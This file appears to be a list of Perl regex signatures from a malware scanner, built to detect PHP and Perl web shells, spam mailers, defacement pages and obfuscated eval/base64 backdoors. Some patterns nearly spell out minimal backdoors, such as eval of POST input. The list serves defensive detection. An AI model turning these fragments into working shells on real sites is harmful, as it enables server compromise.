qr/<\?php.+?VARIABLES\s+GOES\s+HERE.+?\$shell\_fake\_name.+?RESOURCES\s+GOES\s+HERE.+?\$icon\s+\=\s+\".+?<\/html>\"\;\s+echo\s+preg\_replace\(\"\/\\s\+\/\"\,\"\s+\"\,\$html\_final\)\;\s+\?>/is,
qr/<html><head>.+?<address>Apache\s+Server\s+at.+?Math\.floor\(Math\.random\(\)\*99999999999\)\;var\s+url\s+\=\s+idc\_glo\_url\+.+?else\s+login\_shell\(\)\;\s+if\(isset\(\$\_GET\[\'file\'\]\).+?return\s+\$buff\;\s+\}\s+\}\s+\?>.+?<\/font>\s+<\/footer>\s+<\/html>/is,
qr/<html>.+?Shell\s+priv\s+\/\/F3KS3C.+?\}\s+elseif\(\$\_GET\[\'do\'\]\s+\=\=\s+\'whois\'\)\s+\{\s+\?>.+?<\/select>\&nbsp\;\s+<\/form>/is,
qr/}\s+\}\s+function\s+login\_shell\(\)\s+\{\s+\?>/is,
qr/<script\s+type\=\"text\/javascript\">.+?<\/script>\s+<\/head>\s+<\?php.+?\.\/Mr\.\s+aQ\..+?function\s+w\_wget\(\$array\)\{.+?mail\(\$idb1\,\s+\"Tetep\s+Ganteng\"\,\s+\$idb3\,\s+\"\[\s+\"\s+\.\s+\$\_SERVER\[\'REMOTE\_ADDR\'\]\s+.\s+\"\s+\]\"\)\;\s+\*\/\s+\?>.+?<\/html>/is,
qr/<\!DOCTYPE.+?Yhuricka<\/title>.+?uid\=0\(root\)\s+gid\=0\(root\)\s+groups\=0\(root\).+?0ut<\/font>\s+<\/div>/is,
qr/<\!DOCTYPE.+?HACKED.+?<\/html>.+?<\!\-\-\s+document\.write\(unescape\(.+?\/\/\-\->\s+<\/script>/is,
qr/<\?php\s+\$auth\_pass\s+\=\s+\".+?\"\;\s+\/\/\s+default\:.+?eval\(base64\_decode\(gzinflate\(str\_rot13\(convert\_uudecode\(gzinflate\(base64\_decode\(\(\$.+?\)\)\)\)\)\)\)\)\;/is,
qr/<html>\s+<head>\s+<title>Shell\s+Login<\/title>.+?<\?php\s+function\s+w\(\$dir\,\$perm\)\s+\{.+?if\(isset\(\$\_POST\[\'phpconfig\'\]\)\)\s+\{\s+\?>/is,
qr/<\?php\s+\/\*\s+\*\s+Ochillroot\s+Shell.+?\@clearstatcache\(\)\;.+?\{\$text\s+\=\s+\$\_POST\[\'code\'\]\;\s+\?>/is,
qr/<html>\s+<\!\-\-\s+Hacked\s+by.+?<\/body>\s+<\/html>/is,
qr/<SCRIPT\s+Language\=VBScript><\!\-\-\s+DropFileName\s+\=\s+\"svchost\.exe\"\s+WriteData\s+\=.+?Set\s+WSHshell\s+\=\s+CreateObject\(\"WScript\.Shell\"\)\s+WSHshell\.Run\s+DropPath\,\s+0\s+\/\/\-\-><\/SCRIPT>/is,
qr/<\?php.+?\$auth\_pass\s+\=\s+\".+?\"\;\s+\/\/\s+default\:.+?eval\(base64\_decode\(gzinflate\(str\_rot13\(convert\_uudecode\(gzinflate\(base64\_decode\(\(\$.+?\)\)\)\)\)\)\)\)\;/is,
qr/<\?php\s+\$\{.+?\"\;if\(get\_magic\_quotes\_gpc\(\)\)\{\$.+?\)\)\;return\$\{\$([A-z0-9]{1,20})\}\;\}\s+\?>/is,
qr/<\?php.+?\@clearstatcache\(\)\;.+?echo\s+\"<center>Copyright\s+\&copy\;.+?\}\s+\?>/is,
qr/<\?php.+?\@clearstatcache\(\)\;.+?function\s+login\_shell\(\)\s+\{.+?if\(\!is\_readable\(\$dir\)\)\s+\{.+?\}\s+\?>\s+<\/html>/is,
qr/<\?php.+?if\(get\_magic\_quotes\_gpc\(\)\)\{.+?foreach\(\$scandir\s+as\s+\$dir\)\{.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+ini\_get\(\'max\_execution\_time\'\)\;.+?\$message\s+\=\s+stripslashes\(\$message\)\;.+?BLACKER\.X\s+<\/p>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$web\s+\=\s+\$\_SERVER\[\"HTTP\_HOST\"\]\;.+?Shell\s+http\:\/\/\$web\$inj.+?IP\:\s+\"\;\s+\}\s+\?>/is,
qr/<\?php.+?\$\{.+?\$\{.+?\$\{.+?\;\$\{\"G.+?\;\$\{\"G.+?\;\$\{\"G.+?\}\)\;\}\}\}\}\}\s+\/\/([A-z0-9]{1,20})\s+\?>/is,
qr/<\?php\s+echo\s+\'<form\s+action\=\"\"\s+method\=\"post\"\s+enctype\=\"multipart\/form\-data\"\s+name\=\"upl\"\s+id\=\"upl\">\'\;echo\s+\'<input\s+type\=\"file\"\s+name\=\"file\"\s+size\=\"50\"><input\s+name\=\"\_upl\"\s+type\=\"submit\"\s+id\=\"\_upl\"\s+value\=\"Upload\"><\/form>\'\;if\(\s+\$\_POST\[\'\_upl\'\]\s+\=\=\s+\"Upload\"\s+\)\s+\{if\(\@copy\(\$\_FILES\[\'file\'\]\[\'tmp\_name\'\]\,\s+\$\_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\s+\'a\'\;\s+\}else\s+\{echo\s+\'b\'\;\}\}\?>/is,
qr/<\?php\s+header\(\'Content\-Type\:.+?Hacker\s+Shell.+?\)\;break\;default\:home\(\)\;break\;\}\?>/is,
qr/<\?php\s+\@preg\_replace\(\"\/\[pageerror\]\/e\"\,\$\_POST\[.+?\)\;\s+\?><\?php.+?\=urldecode\(.+?create\s+ok\!\"\;\}\}exit\;\'\)\;\$\{.+?\]\(\)\;\?>/is,
qr/<\?php\s+\/\/header\(.+?\=urldecode\(.+?\$start\)\,\(\$\{.+?\]\(\)\;\?>/is,
qr/<\?php\s+if\(\!function\_exists\(.+?\)\+ord\(\$.+?\=strlen\(\$.+?preg\_match\(base64\_decode\(.+?\;\}\}\}\}eval\(.+?\)\)\;\?>/is,
qr/<\?\s+function\s+query\_str\(\$params\)\{.+?BlackSHOP.+?\$numemails\s+\=\s+count\(\$allemails\)\;\s+\$random\_smtp\_string\=array\(.+?eval\(base64\_decode\(\$undetect\)\)\;\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$\w\=base64\_decode\(\'.+?\'\)\.\$\_GET\[\'\w\'\]\.\'\w\'\;\@\$\w\(\$\_POST\[\'\w\'\]\)\;echo\s+\"abc\"\?>/is,
qr/<\?php.+?Akismet3.+?str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(.+?create\_function\(null\,\s+\$.+?\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{20,})\=.+?\"\;\s+eval\(base64\_decode\(gzuncompress\(base64\_decode\(\$([A-z0-9]{20,})\)\)\)\)\;\?>/is,
qr/<\?php\s+\$wp\_load\s+\=\s+\"wp\-load\.php\"\;\s+\$wp\_pluggable\s+\=\s+\"wp\-includes\/pluggable\.php\"\;.+?No\s+posts\s+found<\/error>\"\;\s+\}\s+\}\s+\?><\?php\s+\/\*\s+wp\-code\-inserted\s+\*\/\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$.+?\=\s+\'base\'\s+\.\'64\_d\'\s+\.\'ecod\'\s+\.\'e\'\;\$.+?\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$.+?\=\s+array\(\".+?\)\;\s+eval\(\s+\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(E\_ERROR.+?global\s+\$site\_root\_dir\;.+?if\(PLATFORM\s+\=\=\s+WORDPRESS\)\s+\{.+?\/\/print\s+PLATFORM\;\s+\/\/print\_r\(\$all\_dirs\)\;\s+\?>/is,
qr/<\?php\s+\@preg\_replace\(\"\/\/e\"\,\$\_POST\[\'.+?\'\]\,\"Access\s+Denied\"\)\;\?>/is,
qr/<\?php\s+\@eval\(\$\_POST\[\'([A-z0-9]{1,})\'\]\)\;\s+\?>/is,
qr/<\?php.+?if\(isset\(\$\_GET\[\'check\'\]\)\)\{\s+\$file\[\]\s+\=\s+\'id0\.php\'\;.+?curl\_close\(\$ch\)\;\s+\}\s+return\s+\$data\;\s+\}/is,
qr/<\?php\s+\$arrId\s+\=\s+array\(.+?\'([0-9]{1,20})\-([0-9]{1,20})\'\,.+?\)\;\s+\?>/is,
qr/<\?php.+?\$arrnametime\[\]\=.+?\$arr\_word\[.+?\$arr\_key\[\]\=.+?\$strRand\[.+?return\s+\(\$ip\s+\?\s+\$ip\s+\:\s+\$\_SERVER\[\'REMOTE\_ADDR\'\]\)\;\}\s+\/\/file\s+end/is,
qr/<\?php\s+\$\{\"G.+?\(\$\{\$\{\"G\\x\d\wOB\\x\d\dL\\x\d\d\"\}\[.+?\\n\"\;\s+\?>/is,
qr/<\?php\s+echo\s+\'\s+<title>unzip\s+file\s+by\s+ahwak2000.+?\/\/by\s+ahwak2000\s+\?>/is,
qr/<\?php\s+\$\w\=\"ass\"\.\"ert\"\;\s+\$\w\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'([A-z0-9]{1,})\'\]\)\;\?>/is,
qr/<\?php\s+mb\_http\_input\(.+?\.php\_uname\(\)\..+?Upload\s+Failed\s+\!\!\!.+?while\(\$email\[\$i\]\).+?\$voy\+\+\;\s+\}\s+\?>\s+<\/DIV>\s+<\/div>\s+<\/form>/is,
qr/<\?php.+?\/\/w4l3XzY3\s+wuz\s+here\s+if\(isset\(\$\_POST\[\'action\'\]\s+\)\s+\)\{.+?\?>\s+<\?php\s+if\(isset\(\$\_GET\[\'u\'\]\).+?\.php\_uname\(\)\..+?\}\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+echo\s+\"walex\\n\"\;\s+echo\s+php\_uname\(\)\;\s+\@unlink\(\_\_FILE\_\_\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=.+?\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$.+?\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+([0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+([0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\s+\?>/is,
qr/<\!DOCTYPE.+?Spyus\s+ANH\s+Mailer.+?PRIV8\s+MA\!L3R.+?<\?php\s+\(\@copy\(\$\_FILES\[.+?<\/script>\s+<\/body>\s+<\/html>/is,
qr/<\?php.+?priv8.+?eval\(.+?\}\?>/is,
qr/<\?php\s+if\s+\(\!function\_exists\(.+?\=\s+base64\_decode\(\$.+?preg\_match\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+eval\s+\(\$\_POST\[\d\]\)\;\s+\?>/is,
qr/<\?php\s+\$auth\_pass\s+\=\s+\"\"\;.+?\$default\_action\s+\=\s+base64\_decode\(\'.+?eval\(base64\_decode\(.+?\)\)\;\s+return\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\"\w\"\]\)\)\s+\{\$\w\=\"ass\"\.\"ert\"\;\$\w\=\$\w\(\$\_REQUEST\[\"\w\"\]\)\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\=\s+array\(\'base\'\s+\,\'64\_d\'\s+\,\'ecod\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'g\'\,\s+\'z\'\,\s+\'u\'\,\s+\'n\'\,\s+\'c\'\,\s+\'o\'\,\s+\'m\'\,\s+\'p\'\,\s+\'r\'\,\s+\'e\'\,\s+\'s\'\,\s+\'s\'\)\s+\;\$.+?\)\;\s+eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?\s+error\_reporting\(0\)\;\$\w\=\(isset\(\$\_SERVER\[\"HTTP\_HOST\"\]\)\?\$\_SERVER\[.+?if\(\$\w\=file\_get\_contents\(base64\_decode\(.+?\$\w\=curl\_exec\(\$\w+\)\;curl\_close\(\$\w+\)\;eval\(\$\w\)\;\}\;die\(\)\;\s+\?>/is,
qr/<\?php.+?\$wordpress\_main\_content.+?\$joomla\_main\_content.+?return\s+false\;\s+\}\s+\?>/is,
qr/<\?php.+?zen\.spamhaus\.org.+?implode\(\"\.\"\,\s+array\_reverse\(explode\(\"\.\"\,\s+\$.+?echo\(result\(array\(.+?\?>/is,
qr/<\?php\s+\/\*\s+([A-z0-9]{1,20})\s+\*\/\s+\$eval\=\(\"\?>\"\.gzuncompress\(base64\_decode\(.+?\)\)\)\;\@eval\(\$eval\)\;\s+\?>/is,
qr/\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\s+\=\s+\'decode\'\;\s+\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(.+?\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(.+?function\s+get\_data\_ya\(\$url\)\s+\{.+?function\s+wp\_cd\(.+?unlink\(\"\{\$([A-z0-9]{1,20})\}\.\$([A-z0-9]{1,20})\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\'([A-z0-9]{1,20})\'\;\s+\}/is,
qr/<\?php\s+echo\s+\"Uname\:\"\.system\(\'uname\s+\-a\'\)\;.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(\$([A-z0-9]{1,20})\_\=implode\(\"\"\,\$\_POST\)\)\{\$([A-z0-9]{1,20})\_\=tmpfile\(\)\;fwrite\(\$([A-z0-9]{1,20})\_\,rawurldecode\(\$([A-z0-9]{1,20})\_\)\)\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=stream\_get\_meta\_data\(\$([A-z0-9]{1,20})\_\)\;require\_once\(\$([A-z0-9]{1,20})\[\"uri\"\]\)\;\/\*([A-z0-9]{1,20})\*\/\}else\s+die\(\"error\"\)\;\?>/is,
qr/<\?php.+?b374k.+?\$GLOBALS\[\'pass\'\]\s+\=.+?\$func\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$b374k\=\$func\(\'\$\w\'\,\'ev\'\.\'al\'\.\'\(\"\?>\"\.gz\'\.\'un\'\.\'com\'\.\'pre\'\.\'ss\(ba\'\.\'se\'\.\'64\'\.\'\_de\'\.\'co\'\.\'de\(\$\w\)\)\)\;\'\)\;\$b374k\(\".+?\)\;\?>/is,
qr/<\?php\s+\$target\_path\=basename\(\$\_FILES\[.+?\]\)\;if\(move\_uploaded\_file\(\$\_FILES\[.+?><input\s+type\=\"submit\"\s+value\=\"Upload\s+File\"\/><\/form>/is,
qr/<\?php\s+\$auth\s+\=.+?function\s+display\_auth\_form\(\)\s+\{.+?auth\(\)\;.+?if\s+\(isset\(\$\_POST\[\'action\'\]\)\).+?default\:\s+return\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\]\;\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\}\s+\}\s+if\s+\(\$([A-z0-9]{1,20})\s+>\=\s+\$([A-z0-9]{1,20})\)\s+\{\s+\$([A-z0-9]{1,20})\s+\+\=\s+1\;\s+\}\s+return\s+\$([A-z0-9]{1,20})\;\s+\}/is,
qr/<\?php.+?eval\(\"\\\$\w\=gzin\"\.\"flate\(base\"\.\"64\_de\"\.\"code\(\\\".+?\\\"\)\)\;\"\)\;eval\(\"\?>\"\.\$\w\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$.+?\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?\=\s+\'im\'\s+\.\'pl\'\s+\.\'od\'\s+\.\'e\'\;\$.+?\=\s+array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=\'\'\;\@eval\(base64\_decode\(.+?\)\)\;\/\*\,\*\//is,
qr/<\?php\s+preg\_replace\(\"\\x.+?\\x3B\"\,\"\"\)\;\s+\?>/is,
qr/<\?php.+?WordPress\s+Options\s+Header.+?eval\(gzinflate\(base64\_decode\(rawurldecode\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$extraneous\=base64\_decode\(.+?\)\;\s+eval\(\"return\s+eval\(\\\"\$extraneous\\\"\)\;\"\)\s+\?>/is,
qr/<\?php\s+header\(\'Location\:\s+http\:\/\/.+?\/\'\)\;exit\;\s+\?>/is,
qr/<\?php\s+\$code\=base64\_decode\(.+?\)\;\s+eval\(\"return\s+eval\(\\\"\$code\\\"\)\;\"\)\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=.+?\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{1,20})\"\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+([0-9]{1,20})\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+\?>/is,
qr/<\?php\s+\/\*versio\:\d\.\d\d\*\/\s+\$GLOBALS\[\"yfegmf\"\]\=\".+?\$GLOBALS\[\'yfegmf\'\]\;\$.+?\)\)\;\}\;eval\(.+?\)\)\;\}\;\?>/is,
qr/<\?php.+?if\(isset\(\$\_REQUEST\[.+?\]\;\s+eval\(\$.+?\)\;\s+exit\(0\)\;\s+\}\s+if\(isset\(\$\_REQUEST\[.+?\=\s+fwrite\(\$.+?\)\;\s+echo\s+\$([A-z0-9]{1,20})\;\s+exit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[.+?\=\s+stripslashes\(base64\_decode\(\$\_POST\[.+?\=\s+stripslashes\(base64\_decode\(\$\_POST\[.+?\=\s+mail\(stripslashes\(\$.+?if\(\$([A-z0-9]{1,20})\)\{echo\s+\'([A-z0-9]{1,20})\'\;\}\s+else\s+\{echo\s+\'([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+\/\/([A-z0-9]{100,}).+?eval\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?\$hash\s+\=.+?\$search\s+\=\s+\'\'\;\s+\$wp\_file\_descriptions\s+\=\s+array\(.+?\/\/\s+Deprecated\s+files\s+\'md5\_check\.php\'\s+\=>.+?\$wp\_template\s+\=\s+\@preg\_replace\(.+?\]\)\;\s+\?>/is,
qr/<\?php.+?function\s+pre\_term\_name\(\s+\$wp\_kses\_data\,\s+\$wp\_nonce\s+\)\s+\{.+?\$wp\_default\_logo\s+\=.+?echo\s+\$wp\_auth\_check\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\'\'\,\s+\'.+?\)\;\s+\$([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+if\s+\(\$\_REQUEST\[.+?\$in\_data\s+\=\s+base64\_decode\(\$\_REQUEST\[\'query\'\]\)\;.+?\{echo\s+\'bad\s+request\'\;\}.+?\}\s+else\s+\{echo\s+\'not\s+found\'\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;.+?\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;.+?\}\s+else\s+\{echo\s+\'([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+header\(\"HTTP\/1\.0\s+404\s+Not\s+Found\"\)\;.+?if\(\!empty\(\$\_REQUEST\[\$.+?\=\"ass\"\.\/\*\;\$\w\=\*\/\"ert\"\;\@\$\w\(stripslashes\(\$\_REQUEST\[\$.+?\]\)\)\;\}else\@unlink\(\_\_FILE\_\_\)\;.+?\/\/([A-z0-9]{5,})\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'st\'\.\'rr\'\.\'ev\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'eta\'\.\'lfn\'\.\'izg\'\)\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$.+?\(\'\'\,\$([A-z0-9]{1,20})\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$([A-z0-9]{1,20})\s+\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$.+?\=\s+array\(.+?\)\;\s+eval\(\s+\$([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\s+\(\'\'\,\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$([A-z0-9]{1,20})\s+\=\s+\'ba\'\s+\.\'se\'\s+\.\'64\'\s+\.\'\_d\'\s+\.\'ec\'\s+\.\'od\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\)\;\s+eval\(\s+\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'s\'\.chr\(.+?\)\.\'rrev\'\;\$.+?\=\s+array\(.+?\(\'e\'\.\'t\'\.\'a\'\.\'l\'\.\'f\'\.\'n\'\.\'i\'\.\'z\'\.\'g\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'base\'\s+\,\'64\_d\'\s+\,\'ecod\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'gzun\'\,\s+\'comp\'\,\s+\'ress\'\)\s+\;\$.+?eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\$.+?\)\.\'rev\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'edo\'\.\'lpm\'\.\'i\'\)\;\$.+?\(\'eta\'\.\'lfn\'\.\'izg\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'st\'\.\'rr\'\.\'ev\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'edo\'\.\'ced\'\.\'\_46\'\.\'esa\'\.\'b\'\)\;\$.+?\(\'edo\'\.\'lpm\'\.\'i\'\)\;\$.+?\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+function\s+inject\_gtm\(\$file\,\s+\&\$arr\).+?\$script\s+\=\s+\'\$\{.+?<<\/DEL\_FAIL>>\"\;\s+\}/is,
qr/<\?php\s+\$\{\"\\x.+?\;\$\{\"GLOB\\x.+?\)\;\$\{\$\{.+?ALS\"\}\[\".+?\@\$\{\$([A-z0-9]{1,20})\}\(\$\_POST\[\"\w\"\]\)\;echo.+?\;\?>/is,
qr/<\?php\s+echo.+?\.php\_uname\(\)\..+?Upload.+?Upload.+?Upload.+?\}\s+\}\s+\?>/is,
qr/<\?php\s+\$.+?\'gz\'\.\s+\'un\'\.\s+\'co\'\.\s+\'mp\'\.\s+\'re\'\.\s+\'ss\'.+?\'bas\'\s+\.\'e64\'\s+\.\'\_de\'\s+\.\'cod\'\s+\.\'e\'.+?\'i\'\s+\.\'m\'\s+\.\'p\'\s+\.\'l\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'.+?array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'et\'\.\'al\'\.\'fn\'\.\'iz\'\.\'g\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+eval\(\"\\n\\\$([A-z0-9]{1,20})\s+\=\s+intval\(\_\_LINE\_\_\)\s+\*\s+337\;\"\)\;.+?eval\s+\(gzinflate\(base64\_decode\(\$\w\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\$\_POST\[\'([A-z0-9]{1,20})\'\]\;if\(\$([A-z0-9]{1,20})\!\=\'\'\)\{\$([A-z0-9]{1,20})\=base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\@eval\(\"\\\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\;\"\)\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[.+?\$email\s+\=\s+\@base64\_decode\(.+?return\s+jk\_\_\_\(\$url\)\;\s+\}\s+\}\s+\}/is,
qr/<\?php\s+\/\*Details.+?\$auth\_pass\s+\=.+?\$\_\_\=s\(base64\_decode\(.+?\$\_\=create\_function\(\"\"\,\@gzuncompress\(\$\_\_\)\)\;\$\_\(\)\;\?>/is,
qr/eval\(str\_rot13\(\'([A-z0-9]{1,20})\s+([A-z0-9]{1,20})\_([A-z0-9]{1,20})\(\)\{\$\w\=.+?\$\w\=([A-z0-9]{1,20})\(\_\_([A-z0-9]{1,20})\_\_\)\..+?\}\}([A-z0-9]{1,20})\_([A-z0-9]{1,20})\(\)\;\'\)\)\;/is,
qr/<html>\s+<head>\s+<title>Local\s+DOMAIN\:USER\s+Show\s+\|\s+by\s+\[\s+Lagripe\-Dz\s+\]<\/title>.+?\@implode\(\@file\(\"\/etc\/named\.conf\"\)\)\;.+?<\/body>\s+\<\/html>/is,
qr/<\?php.+?\'gz\'\.\s+\'un\'\.\s+\'co\'\.\s+\'mp\'\.\s+\'re\'\.\s+\'ss\'.+?\'base\'\s+\.\'64\_d\'\s+\.\'ecod\'\s+\.\'e\'.+?\'i\'\s+\.\'m\'\s+\.\'p\'\s+\.\'l\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'.+?array\(.+?eval.+?\?>/is,
qr/<\?php\s+\$auth\_pass.+?Shell.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$pass\s+\=.+?Blackwave\s+Mass\s+Defacer.+?Contact\s+Me<\/font>/is,
qr/<\?php.+?PHP\s+Encoder\s+priv8.+?set\_time\_limit\(0\)\;error\_reporting\(0\)\;preg\_replace\(\"\\x.+?\)\;\s+\?>/is,
qr/<\?php\s+\$color\s+\=\s+\"\#df5\"\;.+?FilesMan.+?Found\'\)\;\s+exit\;/is,
qr/<\?php.+?\$wp\_object\_cache\s+\=.+?strrev\(\'edo\'\.\'c\'\.\'ed\_4\'\.\'6e\'\.\'sab\'\)\;.+?strrev\(\'ecalp\'\.\'er\'\.\'\_ge\'\.\'rp\'\)\;.+?\\x3B\"\,\"\.\"\)\;\s+\?>/is,
qr/\#\!\/usr\/bin\/perl.+?use\s+MIME\:\:Base64.+?\}\)\{print\s+decode\_base64\(\$.+?system\(decode\_base64\(\$.+?<\/pre>\"\}\}/is,
qr/\#Coded\s+By.+?AddHandler\s+cgi\-script\s+\.alfa/is,
qr/\#\!\/usr\/bin\/perl\s+\-I\/usr\/local\/bandmin\s+use\s+MIME\:\:Base64\;use\s+Compress\:\:Zlib\;eval\(Compress\:\:Zlib\:\:memGunzip\(decode\_base64\(.+?\)\)\)\;/is,
